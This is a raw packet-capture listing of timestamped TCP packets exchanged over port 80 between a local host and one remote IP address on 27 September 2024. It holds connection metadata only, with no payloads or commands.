Sep 27, 2024 00:15:13.990617037 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.990636110 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.990648985 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.990660906 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.990664959 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.990699053 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.991182089 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.991198063 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.991219997 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.991235018 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.991250038 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.991257906 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.991266966 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.991276026 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.991281986 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.991298914 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.991306067 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.991313934 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.991344929 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.992152929 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.992167950 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.992182970 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.992197990 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.992208958 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.992216110 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.992227077 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.992232084 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.992248058 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.992258072 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.992264032 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.992280006 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.992294073 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.992320061 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.992342949 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.993065119 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.993081093 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.993096113 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.993113041 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.993119001 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.993129015 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.993138075 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.993146896 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.993160009 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.993171930 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.993176937 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.993195057 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.993200064 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.993211031 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.993226051 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.993237972 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.993263960 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.993921041 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.993937016 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.993952036 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.993967056 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.993989944 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.994018078 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.994364023 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.994379044 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.994393110 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.994407892 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.994416952 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.994425058 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.994441032 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.994457006 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.994460106 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.994472027 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.994486094 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.994488955 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.994504929 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.994513035 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.994520903 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.994543076 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.994565964 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.994585037 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.995259047 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.995274067 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.995289087 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.995305061 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.995320082 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.995342016 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.995347023 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.995356083 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.995364904 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.995373011 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.995379925 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.995395899 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.995409012 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.995424032 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.995439053 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.995495081 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.996193886 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.996211052 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.996226072 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.996237993 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.996243000 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.996258020 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.996263027 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.996278048 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.996294022 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.996310949 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.996310949 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.996326923 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.996330023 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.996344090 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.996359110 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.996368885 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.996373892 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.996390104 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.996402025 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.996431112 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.997123957 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.997139931 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.997154951 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.997170925 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.997181892 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.997185946 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.997204065 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.997211933 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.997219086 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.997235060 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.997251034 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.997256994 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.997266054 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.997282028 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.997287989 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.997298002 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.997323036 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.997342110 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.998044014 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.998060942 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.998107910 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.998123884 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.998138905 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.998137951 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.998156071 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.998162031 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.998172998 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.998189926 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.998194933 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.998208046 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.998224974 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.998240948 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.998255968 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.998256922 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.998270988 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.998296976 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.998835087 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.998851061 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.998864889 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.998924971 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.078720093 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.078737020 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.078746080 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.078892946 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.078897953 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.078908920 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.078919888 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.078927994 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.078994989 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.079032898 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.079049110 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.079139948 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.079227924 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.079246044 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.079260111 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.079308987 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.079368114 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.079391003 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.079407930 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.079446077 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.079540014 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.079555035 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.079570055 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.079605103 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.079621077 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.079719067 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.079735041 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.079750061 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.079792023 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.079871893 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.079886913 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.079904079 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.079946995 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.080234051 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.080249071 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.080264091 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.080279112 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.080296993 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.080307961 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.080313921 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.080315113 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.080331087 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.080346107 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.080358982 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.080369949 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.080382109 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.080385923 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.080434084 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.080574036 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.080591917 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.080631018 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.080734968 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.080749989 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.080765963 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.080781937 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.080796003 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.080806971 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.080811977 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.080826998 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.080828905 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.080856085 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.081187963 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.081365108 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.081381083 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.081396103 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.081410885 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.081412077 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.081428051 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.081440926 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.081445932 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.081460953 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.081468105 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.081487894 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.081700087 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.081715107 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.081728935 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.081739902 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.081743956 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.081760883 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.081769943 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.081808090 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.081842899 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.081860065 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.082199097 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.082241058 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.082412958 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.082428932 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.082442999 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.082458973 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.082475901 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.082492113 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.082504988 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.082510948 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.082519054 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.082529068 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.082545042 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.082561016 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.082567930 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.082576036 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.082592010 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.082601070 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.082617998 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.082618952 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.082659960 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.082986116 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083159924 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083174944 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083189011 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083220959 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083230019 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.083239079 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083255053 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083270073 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083281040 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.083286047 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083302021 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083313942 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.083317995 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083332062 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083336115 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.083364964 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083370924 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.083398104 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083421946 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083436012 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083453894 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083470106 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083477020 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.083486080 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083499908 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083508968 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.083514929 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083529949 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083544970 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083551884 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.083561897 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083575964 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083581924 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.083591938 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083604097 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.083606005 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083621979 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083632946 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.083642960 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083658934 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083664894 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.083676100 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083709002 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.083729029 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083745003 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083867073 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083883047 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083898067 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083908081 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.083913088 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083928108 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083940029 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.083944082 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083959103 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083973885 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.083982944 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.083991051 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.084012032 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.084028959 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.084238052 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.165555954 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.165615082 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.165631056 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.165676117 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.165738106 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.165754080 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.165769100 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.165786028 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.165811062 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.166007996 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.166023016 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.166038990 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.166054010 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.166064024 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.166069031 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.166085958 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.166090965 CEST	49774	80	192.168.2.4	147.45.44.104
